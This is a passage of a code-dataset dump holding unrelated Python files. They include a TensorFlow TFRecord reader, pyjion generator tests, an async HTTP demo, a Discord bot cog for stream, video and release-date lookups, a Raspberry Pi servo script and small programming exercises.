target_width=max_sequence_size,\n )\n\n mask = tf.cond(\n tf.shape(mask)[1] <= max_sequence_size,\n # Pad if there are missing sequence\n lambda: image.pad_to_bounding_box(\n mask,\n offset_height=0,\n offset_width=0,\n target_height=1,\n target_width=max_sequence_size,\n ),\n # Crop if there are extra sequence\n crop_fn,\n )\n mask = tf.squeeze(mask)\n else:\n mask = tf.squeeze(mask, axis=0)\n\n # Check validity of mask\n tf.debugging.assert_greater(sequence_size, tf.constant(0, dtype=tf.int64))\n\n features_dict[\"mask\"] = mask\n sequence_size = max_sequence_size if pad_sequence else sequence_size\n\n # Pad sequence features to max_sequence_size\n for feature_info in feature_config.get_sequence_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.fill(\n value=tf.constant(\n value=feature_config.get_default_value(feature_info),\n dtype=feature_info[\"dtype\"],\n ),\n dims=[max_sequence_size if pad_sequence else sequence_size],\n )\n feature_tensor = sequence_features.get(feature_info[\"name\"], default_tensor)\n\n if isinstance(feature_tensor, sparse.SparseTensor):\n feature_tensor = sparse.reset_shape(\n feature_tensor,\n new_shape=[1, max_sequence_size if pad_sequence else sequence_size],\n )\n feature_tensor = sparse.to_dense(feature_tensor)\n feature_tensor = tf.squeeze(feature_tensor, axis=0)\n\n # Preprocess features\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n labels = features_dict.pop(feature_config.get_label(key=\"name\"))\n\n if not required_fields_only:\n # Check if label is one-hot and correctly masked\n tf.debugging.assert_equal(tf.cast(tf.reduce_sum(labels), tf.float32), tf.constant(1.0))\n\n return features_dict, labels\n\n return _parse_sequence_example_fn\n\n\ndef get_parse_fn(\n tfrecord_type: str,\n feature_config: FeatureConfig,\n preprocessing_keys_to_fns: dict,\n max_sequence_size: int = 0,\n required_fields_only: bool = False,\n pad_sequence: bool = True,\n):\n # Define preprocessing functions\n preprocessing_map = PreprocessingMap()\n preprocessing_map.add_fns(preprocessing_keys_to_fns)\n\n # Generate parsing function\n if tfrecord_type == TFRecordTypeKey.EXAMPLE:\n parse_fn = make_example_parse_fn(\n feature_config=feature_config,\n preprocessing_map=preprocessing_map,\n required_fields_only=required_fields_only,\n )\n elif tfrecord_type == TFRecordTypeKey.SEQUENCE_EXAMPLE:\n parse_fn = make_sequence_example_parse_fn(\n feature_config=feature_config,\n preprocessing_map=preprocessing_map,\n max_sequence_size=max_sequence_size,\n required_fields_only=required_fields_only,\n pad_sequence=pad_sequence,\n )\n else:\n raise KeyError(\"Invalid TFRecord type specified: {}\".format(tfrecord_type))\n\n return parse_fn\n\n\ndef read(\n data_dir: str,\n feature_config: FeatureConfig,\n tfrecord_type: str,\n file_io: FileIO,\n max_sequence_size: int = 0,\n batch_size: int = 0,\n preprocessing_keys_to_fns: dict = {},\n parse_tfrecord: bool = True,\n use_part_files: bool = False,\n logger: Logger = None,\n **kwargs\n) -> data.TFRecordDataset:\n \"\"\"\n - reads tfrecord data from an input directory\n - selects relevant features\n - creates X and y data\n\n Args:\n data_dir: Path to directory containing csv files to read\n feature_config: ml4ir.config.features.Features object extracted from the feature config\n tfrecord_type: either example or sequence_example\n batch_size: int value specifying the size of the batch\n preprocessing_keys_to_fns: dictionary mapping preprocessing keys in the feature_config to functions\n parse_tfrecord: whether to parse SequenceExamples into features\n logger: logging object\n\n Returns:\n tensorflow dataset\n \"\"\"\n parse_fn = get_parse_fn(\n feature_config=feature_config,\n tfrecord_type=tfrecord_type,\n preprocessing_keys_to_fns=preprocessing_keys_to_fns,\n max_sequence_size=max_sequence_size,\n )\n\n # Get all tfrecord files in directory\n tfrecord_files = file_io.get_files_in_directory(\n data_dir,\n extension=\"\" if use_part_files else \".tfrecord\",\n prefix=\"part-\" if use_part_files else \"\",\n )\n\n # Parse the protobuf data to create a TFRecordDataset\n dataset = data.TFRecordDataset(tfrecord_files)\n if parse_tfrecord:\n dataset = dataset.map(parse_fn).apply(data.experimental.ignore_errors())\n\n # Create BatchedDataSet\n if batch_size:\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n if logger:\n logger.info(\n \"Created TFRecordDataset from SequenceExample protobufs from {} files : {}\".format(\n len(tfrecord_files), str(tfrecord_files)[:50]\n )\n )\n\n return dataset\n","sub_path":"python/ml4ir/base/data/tfrecord_reader.py","file_name":"tfrecord_reader.py","file_ext":"py","file_size_in_byte":13807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"459629407","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\n\n# from sklearn import svm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# import create_data\nfrom mpl_toolkits import mplot3d\n\nsns.set(font_scale=1)\n\n\nrecipies = pd.read_csv('data.csv')\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\n# Data for a three-dimensional line\nzline = np.linspace(0, 15, 1000)\nxline = np.sin(zline)\nyline = np.cos(zline)\nax.plot3D(xline, yline, zline, 'gray')\n\n# Data for three-dimensional scattered points\nzdata = 15 * np.random.random(100)\nxdata = np.sin(zdata) + 0.1 * np.random.randn(100)\nydata = np.cos(zdata) + 0.1 * np.random.randn(100)\nax.scatter3D(xdata, ydata, zdata, c=zdata, cmap='Greens')\n\n\nplt.show()\n","sub_path":"SVM/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"316374829","text":"from osv import fields, osv\n\nclass sale_order(osv.osv):\n _inherit = 'sale.order'\n\n def manual_invoice(self, cr, uid, ids, context=None):\n if context:\n partner=context.get('partner_id') \n res = super(sale_order, self).manual_invoice(cr, uid, ids,context)\n inv_obj=self.pool.get('account.invoice')\n for invoice in inv_obj.browse(cr,uid,[res['res_id']]):\n invoice_address=invoice.partner_id.street \n invoice_phone=invoice.partner_id.phone or invoice.partner_id.mobile\n inv_obj.write(cr,uid,res['res_id'],{'invoice_address':invoice_address,'invoice_phone':invoice_phone})\n return res\nsale_order()","sub_path":"ecua_invoice/objects/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546541095","text":"# 2020.12.24(목)\n# 최대값 찾기\n\ninput_array = [3, 5, 6, 1, 2, 4]\n\n\n# 1.내가 짠 코드\ndef find_max_num(array):\n max_value = max(array)\n return max_value\n\n\n# 2.비효율적인 코드\n# 각 숫자마다 모든 다른 숫자와 비교해서 최대값 찾기\ndef find_max_num2(array):\n for num in array:\n for compare_num in array:\n if num < compare_num:\n break\n else:\n return num\n\n\nresult = find_max_num(input_array)\nprint(result)\n","sub_path":"Study/My_cource/week_1/01_01_find_max_num.py","file_name":"01_01_find_max_num.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"20624671","text":"class Solution:\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n candidates.sort()\n self.anslist = []\n self.DFS(candidates, target, 0, [])\n return self.anslist\n\n def DFS(self, cand, tar, start, value_list):\n if tar == 0:\n return self.anslist.append(value_list)\n for i in range(start, len(cand)):\n if cand[i] > tar:\n return\n self.DFS(cand, tar - cand[i], i, value_list+[cand[i]])\n","sub_path":"src/python/combination-sum-39.py","file_name":"combination-sum-39.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56358271","text":"from io import StringIO\nimport pyjion\n\n\ndef test_single_yield():\n def gen():\n x = 1\n yield x\n\n g = gen()\n assert next(g) == 1\n assert not pyjion.info(gen).failed\n\n\ndef test_double_yield():\n def gen():\n x = 1\n yield x\n yield 2\n\n g = gen()\n assert next(g) == 1\n assert next(g) == 2\n assert not pyjion.info(gen).failed\n\n\ndef test_conditional_yield():\n def gen():\n x = 1\n if x == 1:\n yield x\n else:\n yield 2\n\n g = gen()\n assert next(g) == 1\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_iterator():\n def gen():\n yield 1\n yield 2\n yield 3\n\n g = gen()\n result = list(g)\n assert result == [1, 2, 3]\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_range_gen():\n def gen():\n for n in range(10):\n yield f'{n}!'\n\n result = []\n for x in gen():\n result.append(x)\n assert result == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(gen).failed\n\n\ndef test_yields_from_range_gen_listcomp():\n def gen():\n for n in range(10):\n yield f'{n}!'\n\n result = [x for x in gen()]\n assert result == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(gen).failed\n\n\ndef test_nested_generator():\n def evens(i):\n for n in range(10):\n if n % 2:\n yield n\n\n def tens():\n for n in evens(range(100)):\n if n % 10:\n yield f'{n}!'\n\n assert [x for x in tens()] == ['1!', '3!', '5!', '7!', '9!']\n assert not pyjion.info(tens).failed\n assert not pyjion.info(evens).failed\n\n\ndef test_preservation_of_boxed_variables():\n def cr():\n x = '1'\n yield x\n x = '2'\n yield x\n x = '3'\n yield x\n gen = cr()\n assert (next(gen), next(gen), next(gen)) == ('1', '2', '3')\n assert not pyjion.info(cr).failed\n\n\ndef test_preservation_of_unboxed_variables():\n def cr():\n x = 1\n yield x\n x = 2\n yield x\n x = 3\n yield x\n gen = cr()\n assert (next(gen), next(gen), next(gen)) == (1, 2, 3)\n assert not pyjion.info(cr).failed\n\n\ndef test_range_generator():\n def cr():\n for n in range(10):\n yield f'{n}!'\n assert [x for x in cr()] == ['0!', '1!', '2!', '3!', '4!', '5!', '6!', '7!', '8!', '9!']\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches():\n def cr():\n x = '2'\n if x == '2':\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + '2'\n if x == '22':\n yield 'd'\n else:\n yield x\n yield 'c'\n gen = cr()\n assert (next(gen), next(gen), next(gen)) == ('a', 'c', 'd')\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches_for_boxable_vars():\n def cr():\n x = 2\n if x == 2:\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + 2\n if x == 4:\n yield 'd'\n else:\n yield x\n yield 'c'\n gen = cr()\n assert tuple(gen) == ('a', 'c', 'd', 'c')\n assert not pyjion.info(cr).failed\n\n\ndef test_yield_within_branches_for_boxable_vars_as_iter():\n def cr():\n x = 2\n if x == 2:\n yield 'a'\n else:\n yield 'b'\n yield 'c'\n x = x + 2\n if x == 4:\n yield 'd'\n else:\n yield x\n yield 'c'\n assert [x for x in cr()] == ['a', 'c', 'd', 'c']\n assert not pyjion.info(cr).failed\n\n\ndef test_nested_generator_calling_uncompiled_function():\n def cr1():\n with StringIO(\"hello\") as s:\n for letter in s:\n yield letter\n\n def cr2():\n for n in \"!@#%$^\":\n for i in cr1():\n yield n + i\n\n gen = cr2()\n\n assert list(gen) == ['!hello', '@hello', '#hello', '%hello', '$hello', '^hello']\n assert pyjion.info(cr1).failed\n assert not pyjion.info(cr2).failed\n","sub_path":"Tests/test_generators.py","file_name":"test_generators.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335039887","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport lirc\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nGPIO.setup(40,GPIO.OUT)\r\n\r\np = GPIO.PWM(40,100)\r\n\r\np.start(15)\r\n\r\nir_id = lirc.init(\"ir_servo\", blocking = False)\r\n\r\ntry:\r\n while True:\r\n code_ir = lirc.nextcode()\r\n if code_ir[0] == \"pos_0\":\r\n p.ChangeDutyCycle(6.5)\r\n elif code_ir[0] == \"pos_1\":\r\n p.ChangeDutyCycle(15)\r\n elif code_ir[0] == \"pos_2\":\r\n p.ChangeDutyCycle(23.25)\r\nexcept KeyboardInterrupt:\r\n pass\r\n\r\nGPIO.cleanup()\r\n \r\n","sub_path":"Raspberry Pi Expo/ir_servo.py","file_name":"ir_servo.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"206331298","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport socket\nimport selectors\nimport time\n\nsel = selectors.DefaultSelector()\ntag = 10\n\nclass Future(object):\n def __init__(self):\n self.result = None\n self._callbacks = []\n\n def add_done_callback(self, fn):\n self._callbacks.append(fn)\n\n def set_result(self, result):\n self.result = result\n for fn in self._callbacks:\n fn(self)\n\n def __iter__(self):\n yield self\n return self.result\n\ndef to_connect(sock, addr):\n sock.setblocking(False)\n try:\n sock.connect(addr)\n except BlockingIOError:\n pass\n\n f = Future()\n def on_connected():\n f.set_result(None)\n\n sel.register(sock, selectors.EVENT_WRITE, on_connected)\n yield from f\n sel.unregister(sock)\n\ndef read(sock):\n f = Future()\n\n def readable():\n f.set_result(sock.recv(2048))\n\n sel.register(sock, selectors.EVENT_READ, readable)\n slice_res = yield from f\n sel.unregister(sock)\n return slice_res\n\ndef read_all(sock):\n reponse = b''\n slice_res = yield from read(sock)\n while slice_res:\n reponse += slice_res\n slice_res = yield from read(sock)\n return reponse\n\n\nclass Callbaidu(object):\n def __init__(self):\n self.res = b''\n\n def accept(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n yield from to_connect(sock, ('115.239.211.112', 80))\n requests = 'GET / HTTP/1.1\\r\\n Host:www.baidu.com\\r\\nConnection: close\\r\\n\\r\\n'.encode('utf-8')\n sock.send(requests)\n self.res = yield from read_all(sock)\n print(len(self.res))\n\n global tag\n tag -= 1\n\n\n\nclass Task(object):\n def __init__(self, conn):\n self.conn = conn\n f = Future()\n self.step(f)\n\n def step(self, future):\n try:\n # send 会进入到 conn 执行, 即:accept, 直到下次 yield\n # next_future 为 yield 返回的对象\n # 第一次启动 future.result 为 None\n next_future = self.conn.send(future.result)\n except StopIteration:\n return\n next_future.add_done_callback(self.step)\n\n\nif __name__ == '__main__':\n start_time = time.time()\n for i in range(tag):\n call = Callbaidu()\n Task(call.accept())\n\n while tag:\n # 一直阻塞, 直到一个事件发生\n events = sel.select()\n for key, mask in events:\n callback = key.data\n callback()\n\n end_time = time.time()\n print('yield from调用耗时 %s 秒' % (end_time - start_time))","sub_path":"async_sync/select_way_yield_from.py","file_name":"select_way_yield_from.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13280513","text":"from discord.ext import commands\nimport simplify as s\nimport descriptions as desc\nimport aiohttp\nfrom datetime import datetime\nfrom pytz import timezone\nimport tokens as t\nimport calendar\n\n\nclass General:\n def __init__(self, bot):\n \"\"\"\n Edit self.dates with releases we want to track\n \"\"\"\n self.bot = bot\n\n # Dates have to be in relation to UTC (so if release is 5am BST, it would be 4am UTC)\n self.dates = {\n \"Overwatch\": datetime(2016, 5, 23, 23, 0, 0), # launches 12:00am bst, -1 because its in UTC time\n \"Total War: Warhammer\": datetime(2016, 5, 24, 7, 0, 0),\n \"Hearts of Iron 4\": datetime(2016, 6, 6, 0, 0, 0),\n \"No Man's Sky\": datetime(2016, 6, 21, 0, 0, 0),\n \"Deus Ex: Mankind Divided\": datetime(2016, 8, 23, 0, 0, 0),\n \"Battlefield 1\": datetime(2016, 10, 21, 0, 0, 0),\n \"Civilization 6\": datetime(2016, 10, 21, 0, 0, 0),\n \"Dishonored 2\": datetime(2016, 11, 11, 0, 0, 0),\n }\n\n @commands.command(description=desc.reddit, brief=desc.reddit)\n async def reddit(self): # returns link to sub-reddit\n await s.destructmsg(\"https://www.reddit.com/r/idiotechgaming/\", 20, self.bot)\n\n @commands.command(description=desc.github, brief=desc.github)\n async def github(self): # returns link to github for this bot\n await s.destructmsg(\"You can request features, contribute and report issues with the bot here:\"\n \"\\nhttps://github.com/iScrE4m/IdiotechDiscordBot\", 20, self.bot)\n\n @commands.command(description=desc.twitch, brief=desc.twitchb)\n async def twitch(self):\n # finds status of Idiotech's twitch stream\n # if live, it will return amount of viewers, current stream up-time and game being played\n with aiohttp.ClientSession() as session:\n async with session.get('https://api.twitch.tv/kraken/streams?channel=idiotechgaming')as resp:\n data = await resp.json()\n if len(data[\"streams\"]) > 0:\n game = data[\"streams\"][0][\"game\"]\n views = data[\"streams\"][0][\"viewers\"]\n\n fmt = \"%Y-%m-%dT%H:%M:%SZ\"\n hrs, mins, secs = calc_duration(datetime.strptime(data[\"streams\"][0][\"created_at\"], fmt))\n\n # if one person is watching return 'person' instead of people\n if views == 1:\n peep = \"person\"\n else:\n peep = \"people\"\n\n reply = \"**Idiotech** is live streaming **{}** with **{}** {} watching! \" \\\n \"\\nCurrent Uptime: {} hours, {} minutes and {} seconds.\" \\\n \"\\nhttps://www.twitch.tv/idiotechgaming\".format(game, views, peep, hrs, mins, secs)\n else:\n reply = \"https://www.twitch.tv/idiotechgaming (OFFLINE)\"\n await s.destructmsg(reply, 20, self.bot)\n\n @commands.command(description=desc.twitter, brief=desc.twitter)\n async def twitter(self): # returns link to Idiotech's twitter\n await s.destructmsg('https://twitter.com/idiotechgaming', 20, self.bot)\n\n @commands.command(description=desc.fb, brief=desc.fb)\n async def facebook(self): # finds latest facebbok post and returns it, along with link to page\n with aiohttp.ClientSession() as session:\n async with session.get('https://graph.facebook.com/v2.6/idiotechgaming/posts'\n '?access_token={}'.format(t.fb_key)) as resp:\n data = await resp.json()\n\n msg1 = data[\"data\"][0][\"message\"]\n y, m, d, = date_split(data[\"data\"][0][\"created_time\"]) # y = year, m = month, d = day\n\n msg = \"**Latest Facebook Post**\\n\" \\\n \"**Posted:** {}{} of {}, {}.\\n\\n\" \\\n \"```{}```\" \\\n \"https://www.facebook.com/idiotechgaming/\" \\\n \"\".format(d, get_date_suf(d), calendar.month_name[int(m)], y, msg1)\n\n await s.destructmsg(msg, 30, self.bot)\n\n @commands.command(description=desc.youtube, brief=desc.youtube)\n async def youtube(self):\n # finds information on latest upload from Idiotech's youtube channel\n #\n\n connector = aiohttp.TCPConnector(verify_ssl=False)\n\n with aiohttp.ClientSession(connector=connector) as session:\n async with session.get('https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UC0YagOInbZx'\n 'j10gaWwb1Nag&maxResults=1&order=date&key={}'.format(t.yt_key)) as resp:\n data = await resp.json()\n # channel = \"https://www.youtube.com/c/idiotechgaming\"\n\n mo = \"**\" # Modifier (e.g. * for italic, ** for bold, __ for underline and so on)\n title = mo + \"Latest Upload: \" + mo\\\n + data[\"items\"][0][\"snippet\"][\"title\"] # [::-1] # msg + vid title, [::-1] reverses str\n\n uploaded = data[\"items\"][0][\"snippet\"][\"publishedAt\"] # datetime video was uploaded\n date = str(uploaded).split('T')[0] # just the date of upload\n\n year, month, day = date.split('-')\n month = calendar.month_name[int(month)] # takes month number and returns word form (i.e. 05 = may)\n\n uploaded = mo + \"Uploaded: \" + mo + \"{} the {}{}, {}.\".format(month, day, get_date_suf(day), year)\n link = \"https://youtu.be/\" + data[\"items\"][0][\"id\"][\"videoId\"]\n # uses ``` to stop video from being embed\n\n await s.destructmsg(title + \"\\n\" + uploaded + \"\\n\\n\"+link, 30, self.bot)\n\n @commands.command(description=desc.rules, brief=desc.rules)\n async def rules(self):\n await self.bot.say('Please read <#179965419728273408>')\n\n @commands.group(pass_context=True, description=desc.time, brief=desc.time)\n async def time(self, ctx):\n # Group for !time command, set subcommands by wrapping them in @time.command(name='subcommand_name)\n # We use function get_time() to get all the times over the world.\n # To add a city, edit get_time() and add it into dictionary\n\n if ctx.invoked_subcommand is None:\n time = get_time()\n await s.destructmsg(\"**San Francisco**: {} | **New York**: {} | **London**: {} | **Sydney** {}\".format(\n time[\"sf\"], time[\"ny\"], time[\"london\"], time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='advanced', description=desc.time_advanced, brief=desc.time_advanced)\n async def _advanced(self):\n time = get_time()\n await s.destructmsg(\n \"**San Francisco** {} (UTC-7) \"\n \"| **New York**: {} (UTC-4) \"\n \"| **London**: {} (UTC+1) \"\n \"| **Sydney**: {} (UTC+10) \"\n \"\".format(time[\"sf\"], time[\"ny\"], time[\"london\"], time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='sydney', description=desc.time_sydney, brief=desc.time_sydney)\n async def _sydney(self):\n time = get_time()\n await s.destructmsg(\"**Sydney**: {} (UTC+10)\".format(time[\"sydney\"]), 30, self.bot)\n\n @time.command(name='london', description=desc.time_london, brief=desc.time_london)\n async def _london(self):\n time = get_time()\n await s.destructmsg(\"**London**: {} (UTC+1)\".format(time[\"london\"]), 30, self.bot)\n\n @time.command(name='ny', description=desc.time_ny, brief=desc.time_ny)\n async def _ny(self):\n time = get_time()\n await s.destructmsg(\"**New York**: {} (UTC-4)\".format(time[\"ny\"]), 30, self.bot)\n\n @time.command(name='sf', description=desc.time_sf, brief=desc.time_sf)\n async def _sf(self):\n time = get_time()\n await s.destructmsg(\"**San Francisco**: {} (UTC-7)\".format(time[\"sf\"]), 30, self.bot)\n\n @time.command(name='perth', description=desc.time_perth, brief=desc.time_perth)\n async def _perth(self):\n time = get_time()\n await s.destructmsg(\"**Perth**: {} (UTC+8)\".format(time[\"perth\"]), 30, self.bot)\n\n @commands.command(description=desc.steam_status, brief=desc.steam_status)\n async def steam(self):\n steam_api = 'http://is.steam.rip/api/v1/?request=SteamStatus'\n with aiohttp.ClientSession() as session:\n async with session.get(steam_api)as resp:\n data = await resp.json()\n if str(data[\"result\"][\"success\"]) == \"True\":\n login = (data[\"result\"][\"SteamStatus\"][\"services\"][\"SessionsLogon\"]).capitalize()\n community = (data[\"result\"][\"SteamStatus\"][\"services\"][\"SteamCommunity\"]).capitalize()\n economy = (data[\"result\"][\"SteamStatus\"][\"services\"][\"IEconItems\"]).capitalize()\n # leaderboards = (data[\"result\"][\"SteamStatus\"][\"services\"][\"LeaderBoards\"]).capitalize()\n\n reply = \"\"\"__**Steam Status**__\n\n **Login servers:** {}\n **Community servers:** {}\n **Economy servers:** {}\"\"\".format(login, community, economy)\n\n else:\n reply = \"Failed connecting to API - Error: {}\".format(data[\"result\"][\"error\"])\n\n await s.destructmsg(reply, 30, self.bot)\n\n @commands.command(pass_context=True, description=desc.release_dates, brief=desc.release_datesb)\n async def release(self, ctx):\n # We are using manual argument detection instead of @commands.group,\n # because we want subcommands to be dynamic based on our self.dates dictionary\n\n arg = \" \".join(ctx.message.content.split()[1:])\n if len(arg) > 0:\n for game in self.dates:\n if game.lower().startswith(arg.lower()) or game.lower() is arg.lower():\n\n days, hrs, mins = calc_until(self.dates[game])\n\n if int_day(days) < 0: # if hours is a minus (i.e. game is released)\n msg = \"{} is out now!\".format(game)\n elif int_day(days) == 0 and int(hrs) == 0 and int(mins) == 0:\n msg = \"{} releases within the next 60 seconds, HYPE!!!\".format(game)\n else:\n msg = \"{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n await s.destructmsg(msg, 30, self.bot)\n\n break\n else:\n await s.destructmsg(\"No game in our release list found, that starts with {}\".format(arg), 30, self.bot)\n else:\n msg = \"Release Dates List - Times, Dates and Games are subject to change\\n\"\n\n for game, time in sorted(self.dates.items(), key=lambda x: x[1]):\n days, hrs, mins = calc_until(self.dates[game])\n\n if int_day(days) < 0: # if hours is a minus (i.e. game is released)\n msg += \"\\n{} is out now!\".format(game)\n elif int_day(days) == 0 and int(hrs) == 0 and int(mins) == 0:\n msg += \"\\n{} releases within the next 60 seconds, HYPE!!!\".format(game)\n else:\n msg += \"\\n{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n\n # msg += \"\\n{} releases in {}, {} hours and {} minutes.\".format(game, days, hrs, mins)\n\n await s.destructmsg(\"```{}```\".format(msg), 30, self.bot)\n\n\ndef int_day(day):\n \"\"\"\n Takes day as string ('3 days') and returns just the number as an integer\n :param day:\n :return:\n \"\"\"\n day, word = day.split(\" \")\n return int(day)\n\n\ndef get_date_suf(day):\n # Get the suffix to add to date ('st' for 1, 'nd' for 2 and so on) code from http://stackoverflow.com/a/5891598\n if 4 <= int(day) <= 20 or 24 <= int(day) <= 30:\n suffix = \"th\"\n else:\n suffix = [\"st\", \"nd\", \"rd\"][int(day) % 10 - 1]\n return suffix\n\n\ndef date_split(date):\n \"\"\"\n Returns the given datetime as three strings: year, month and day\n\n :param date: The datetime to split into year, month and day\n :return: year, month, day\n \"\"\"\n\n to_split = str(date).split('T')[0]\n year, month, day = to_split.split('-')\n\n return year, month, day\n\n\ndef date_now():\n \"\"\"\n Returns the date now as three strings: year, month and day\n\n :return: year, month, day\n \"\"\"\n\n now = datetime.utcnow()\n date, time = str(now).split(' ')\n year, month, day = date.split('-')\n\n return year, month, day\n\n\ndef calc_until(rd):\n \"\"\"\n Calculates the amount of time between now and 'rd'\n\n :param rd: release date as datetime()\n :return: three strings with time left\n \"\"\"\n\n tdelta = rd - datetime.utcnow()\n tstr = str(tdelta)\n\n test_var = tstr.split(\".\")[0]\n if len(test_var) == 7 or len(test_var) == 8: # is there is still hours in the time left\n days = \"0 days\"\n hrs, mins, secs = test_var.split(\":\")\n elif len(test_var) == 5 or len(test_var) == 4: # if there is still minutes in the time left\n days = \"0 days\"\n hrs = \"0\"\n mins, secs = test_var.split(\":\")\n elif len(test_var) == 1 or len(test_var) == 2: # if there are still seconds remaining until launch\n days = \"0 days\"\n hrs = \"0\"\n mins = \"0\"\n else:\n days, notdays = tstr.split(\",\")\n hrs, mins, secs = notdays.split(\":\")\n\n hrs = hrs.strip() # removes spaces in string\n\n return days, hrs, mins\n\n\ndef calc_duration(start):\n \"\"\"\n Calculates the amount of time between 'start' and now\n\n :param start: Datetime\n :return: three strings with time passed\n \"\"\"\n\n tdelta = datetime.utcnow() - start\n tstr = str(tdelta)\n\n hrs, mins, secs = tstr.split(\":\")\n secs = secs.split(\".\")[0]\n\n return hrs, mins, secs\n\n\ndef get_time() -> dict:\n \"\"\"\n Function to get local time in cities\n\n :return: Dictionary with {\"city\":\"%H:%M\"}\n \"\"\"\n fmt = '%H:%M'\n\n now_utc = datetime.now(timezone('UTC'))\n\n now_pacific = now_utc.astimezone(timezone('US/Pacific'))\n sf = now_pacific.strftime(fmt)\n\n now_london = now_utc.astimezone(timezone('Europe/London'))\n london = now_london.strftime(fmt)\n\n now_sydney = now_utc.astimezone(timezone('Australia/Sydney'))\n sydney = now_sydney.strftime(fmt)\n\n now_perth = now_utc.astimezone(timezone('Australia/Perth'))\n perth = now_perth.strftime(fmt)\n\n now_ny = now_utc.astimezone(timezone('US/Eastern'))\n ny = now_ny.strftime(fmt)\n\n return {\n \"sydney\": sydney,\n \"london\": london,\n \"ny\": ny,\n \"sf\": sf,\n \"perth\": perth\n }\n\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":14653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30485356","text":"from Parents import Button\nfrom helper.helper import kill, cleanupkill\n\n\nclass CancelButton(Button):\n\tdef __init__(self, parent):\n\t\tsuper(CancelButton, self).__init__(parent)\n\n\t\tself.default_x = 600\n\t\tself.default_y = 330\n\t\tself.default_size = 3.5\n\n\t\tself.img_idle = \"res/CancelButton.png\"\n\t\tself.img_hover = \"res/CancelButton_hover.png\"\n\t\tself.img_click = \"res/CancelButton_click.png\"\n\t\tself.proc = None\n\t\tself.parent = parent\n\t\tsuper().setup()\n\n\t\tself.hide()\n\n\tdef mouseclicked(self):\n\t\tif self.main_window.startbutton.proc is not None and self.main_window.startbutton.proc.poll() is None:\n\t\t\tkill(self.main_window.startbutton.proc.pid)\n\t\t\tcleanupkill()\n\t\twith open(\"progress.txt\", \"w\") as file:\n\t\t\tfile.write(\".\")\n","sub_path":"HomeComponents/Buttons/CancelButton.py","file_name":"CancelButton.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616135416","text":"# hello mọi người hôm nay mình sẽ làm từ điển đơn giản bằng python\n# mình xin phép đặt tên tiếng việt\n# quên rồi phải lên google\ncactukhoa = {\n\t'home': 'ngoi nha',\n\t'baby': 'em be',\n\t'game': 'tro choi',\n\t'programmer': 'lap trinh vien',\n\t'programme': 'chuong trinh',\n\t'chicken': 'thit ga',\n\t'English': 'Tieng Anh',\n\t'Vietnam': 'Viet Nam',\n\t'ThaiLand': 'Thai lan'\n}\nhoatdong = True # biến cho biến chương trình có đang hoạt động\n# hàm trang chu\ndef Hienthitrangchu():\n\tprint('------------------------------------------')\n\tprint('Hello moi nguoi da den voi tu dien cua toi') # thới quen của mình khi lập trình js\n\tprint('------------------------------------------')\n\tprint('0. thoat chuong trinh') # thay doi mot chut\n\tprint('1. tim tu')\n\tprint('2. xem tat ca tu')\n# sơ sơ là được rồi\ndef find():\n\tprint('Hay nhap tu nghia tieng anh')\n\ttukhoa = input('Tu khoa la: ')\n\tif tukhoa in cactukhoa:\n\t\tprint('Tu khoa tieng viet la %s' % (cactukhoa[tukhoa]))\n\telse:\n\t\tprint('Khong tim thay tu %s' % (tukhoa))\ndef show():\n\tprint('Day la danh sach cac tu khoa hien co trong tu dien nay')\n\tfor tukhoa, nghia in cactukhoa.items():\n\t\tprint('%s : %s' % (tukhoa, nghia)) # 